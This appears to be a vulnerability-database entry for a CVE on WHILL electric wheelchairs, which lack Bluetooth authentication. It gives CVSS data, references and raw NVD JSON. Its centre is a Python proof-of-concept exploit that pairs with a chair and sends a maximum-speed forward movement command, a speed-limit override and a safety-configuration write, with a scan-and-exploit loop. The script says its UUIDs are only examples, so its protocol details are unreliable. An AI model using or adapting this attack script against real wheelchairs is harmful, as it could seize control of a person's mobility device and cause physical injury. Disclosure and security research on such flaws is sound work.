CVE-2025-14346

Description

WHILL Model C2 Electric Wheelchairs and Model F Power Chairs do not enforce authentication for Bluetooth connections. An attacker within range can pair with the device and issue movement commands, override speed restrictions, and manipulate configuration profiles without any credentials or user interaction.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WHILL Model C2 (所有版本)

WHILL Model F (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-14346 PoC - WHILL Wheelchair Bluetooth Unauthenticated Access
This PoC demonstrates the lack of authentication in WHILL wheelchair Bluetooth pairing.
Note: This is for educational and security research purposes only.
"""

import asyncio
from bleak import BleakClient
import struct

TARGET_DEVICE_NAME = "WHILL"
# Default WHILL service UUIDs (example - actual UUIDs may vary)
WHILL_CONTROL_SERVICE = "0000fff0-0000-1000-8000-00805f9b34fb"
WHILL_CONTROL_CHAR = "0000fff1-0000-1000-8000-00805f9b34fb"

def create_move_command(direction, speed, duration):
    """Create a MOVE command packet for WHILL wheelchair control."""
    # Command structure: [CMD_TYPE, DIR, SPEED, DURATION]
    # DIR: 0x01=forward, 0x02=backward, 0x03=left, 0x04=right
    cmd_type = 0x01  # MOVE command
    return struct.pack('BBBB', cmd_type, direction, speed, duration)

def create_speed_override_command(max_speed):
    """Create a SPEED_OVERRIDE command to bypass speed limits."""
    cmd_type = 0x02  # SPEED_OVERRIDE command
    return struct.pack('BBH', cmd_type, 0x01, max_speed)

async def exploit_cve_2025_14346(device_address):
    """
    Exploit CVE-2025-14346: Unauthenticated Bluetooth access to WHILL wheelchair.
    """
    print(f"[*] Connecting to WHILL device: {device_address}")
    
    try:
        async with BleakClient(device_address) as client:
            # No authentication required - this is the vulnerability
            print("[+] Connected successfully without authentication")
            
            # Discover services
            services = await client.get_services()
            print(f"[*] Discovered {len(services.services)} services")
            
            # Find control service
            control_service = services.get_service(WHILL_CONTROL_SERVICE)
            if not control_service:
                print("[!] Control service not found, scanning...")
                for service in services.services.values():
                    print(f"    Service: {service.uuid}")
                return False
            
            # Get control characteristic
            control_char = control_service.get_characteristic(WHILL_CONTROL_CHAR)
            
            # Attack 1: Send arbitrary movement command
            print("[*] Sending MOVE command (forward, max speed)")
            move_cmd = create_move_command(0x01, 0xFF, 0xFF)
            await client.write_gatt_char(control_char.uuid, move_cmd)
            print("[+] Movement command sent successfully")
            
            # Attack 2: Override speed restrictions
            print("[*] Overriding speed limit to maximum")
            speed_cmd = create_speed_override_command(0xFFFF)
            await client.write_gatt_char(control_char.uuid, speed_cmd)
            print("[+] Speed limit bypassed")
            
            # Attack 3: Modify configuration
            print("[*] Modifying safety configuration")
            config_cmd = bytes([0x03, 0x00, 0x00, 0x00])  # CONFIG_WRITE
            await client.write_gatt_char(control_char.uuid, config_cmd)
            print("[+] Configuration modified")
            
            print("[!] Exploitation complete - device fully compromised")
            return True
            
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

async def scan_and_exploit():
    """Scan for vulnerable WHILL devices and exploit them."""
    print("[*] Scanning for WHILL devices...")
    # Use bluetoothctl or hcitool for scanning
    # Example: hcitool lescan | grep WHILL
    
    # For demonstration, list discovered devices
    devices = [
        "XX:XX:XX:XX:XX:XX"  # Replace with actual device MAC
    ]
    
    for device in devices:
        await exploit_cve_2025_14346(device)

if __name__ == "__main__":
    asyncio.run(scan_and_exploit())

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14346
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14346
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14346/
[4] VulDB https://vuldb.com/cve/CVE-2025-14346
[5] https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-364-01

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14346", "sourceIdentifier": "[email protected]", "published": "2026-01-05T16:15:41.843", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WHILL Model C2 Electric Wheelchairs and Model F Power Chairs do not enforce authentication for Bluetooth connections. An attacker within range can pair with the device and issue movement commands, override speed restrictions, and manipulate configuration profiles without any credentials or user interaction."}, {"lang": "es", "value": "Las sillas de ruedas eléctricas WHILL Modelo C2 y las sillas de ruedas motorizadas Modelo F no aplican autenticación para las conexiones Bluetooth. Un atacante dentro del alcance puede emparejarse con el dispositivo y emitir comandos de movimiento, anular las restricciones de velocidad y manipular perfiles de configuración sin credenciales ni interacción del usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-364-01", "source": "[email protected]"}]}}